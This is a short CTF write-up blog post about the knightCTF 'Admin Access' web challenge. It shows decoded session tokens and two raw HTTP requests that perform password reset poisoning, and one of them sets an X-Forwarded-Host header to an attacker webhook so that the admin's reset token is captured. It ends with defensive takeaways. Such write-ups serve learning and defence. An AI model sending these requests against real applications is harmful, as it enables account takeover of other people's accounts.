Post

knightCTF web/Admin Access

My solution for knightCTF web/Admin Access challenge

Posted
By null_byte
1 min read

Challenge overview

The challenge presents a web application with a login system and password reset functionality. The goal is to gain admin access by exploiting vulnerabilities in the password reset mechanism.

Analysis

Hidden email address found in HTML comment: kctf2025@knightctf.com. Registration attempts with this email confirm it’s an existing admin account.

Password reset functionality is available at /reset-password

Token analysis
The application uses several types of session tokens:

  1. Logout token:
    eyJfZmxhc2hlcyI6W3siIHQiOlsiaW5mbyIsIllvdSBoYXZlIGJlZW4gbG9nZ2VkIG91dC4iXX1dfQ.Z476VQ.znufTcmUbyoU4Jqf8ZHeX5Ku-pc
    Decoded: {"_flashes":[{" t":["info","You have been logged out."]}]}

  2. Page refresh token:
    eyJfZmxhc2hlcyI6W3siIHQiOlsid2FybmluZyIsIlBsZWFzZSBsb2cgaW4gdG8gYWNjZXNzIHRoZSBkYXNoYm9hcmQuIl19XX0.Z475Zw.gxmNA7rq_1toqPuczGdiO77NkmM
    Decoded: {"_flashes":[{" t":["warning","Please log in to access the dashboard."]}]}

  3. Auth token:
    .eJyrVipILC4uzy9KUbJSKkktLjE0NjY3VNJRKi1OLcpLzE1FEa4FAHh-Dvo.Z475Cg.2I8JbpJSsORzxPT45TQ7NexfujI
    Tokens appear to be single-use only and authentication tokens have an unusual format.

Exploitation

The application is vulnerable to password reset poisoning via middleware manipulation, similar to the vulnerability described in PortSwigger’s lab.

Trigger password reset

1
2
3
4
5
6

POST /forgot-password HTTP/1.1
Host: 45.56.68.122:7474
X-Forwarded-Host: [WEBHOOK_URL]
Content-Type: application/x-www-form-urlencoded

email=kctf2025@knightctf.com

token

Reset password

1
2
3
4
5

POST /reset-password HTTP/1.1
Host: 45.56.68.122:7474
Content-Type: application/x-www-form-urlencoded

token=CAPTURED_TOKEN&new_password=NEW_PASSWORD

The key is using the X-Forwarded-Host header to redirect the password reset link to our controlled webhook, allowing us to capture the reset token.

flag

Flag:
KCTF{PaSsW0rD_ReSet_p0isOn1ng_iS_FuN}

Key takeaways

  1. Host header validation
    • Applications should validate and sanitize the X-Forwarded-Host header to prevent password reset poisoning attacks.
  2. Token security
    • Password reset tokens should be: single-use, time-limited, securely generated and properly validated
CTF, knightCTF
ctf writeup knightCTF
This post is licensed under CC BY 4.0 by the author.